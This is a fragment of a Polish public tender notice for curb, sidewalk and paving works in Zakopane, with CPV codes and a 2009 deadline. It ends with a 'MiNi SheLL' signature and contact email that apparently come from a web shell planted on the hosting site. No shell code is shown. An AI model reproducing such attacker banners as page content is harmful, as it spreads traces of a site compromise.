                    zarządcą jest  Burmistrz Gminy Miasta Zakopane

  Zakres robót  zadania II obejmuje:

-	ułożenie krawężników betonowych,
-	ułożenie krawężników granitowych,
-	regulacja krawężników granitowych,
-	ułożenie obrzeży chodnikowych,
-	wykonanie w-wy odcinającej z piasku grubości 8 cm,
-	wykonanie dolnej w-wy podbudowy grubości 20 cm,
-	wykonanie górnej w-wy podbudowy grubości 15 cm,
-	wykonanie nawierzchni chodnika z kostki brukowej na podsypce piaskowej,
-	uzupełnienie poboczy grubości 6 cm
-	demontaż słupków odgradzających,
-	montaż słupków typu AMSTERDAM
-	montaż słupków odgradzających ocynkowanych,
-	malowanie barier ochronnych,
-	inne nie wyszczególnione prace konieczne do wykonania przedmiotu 
         zamówienia które będą rozliczane według składników cenotwórczych podanych 
         w ofercie wykonawcy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.11.00-9, 45.23.33.30-1, 45.23.32.23-8, 45.23.32.90-8, 45.23.32.22-1, 45.23.20.00-2, 45.22.11.19-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com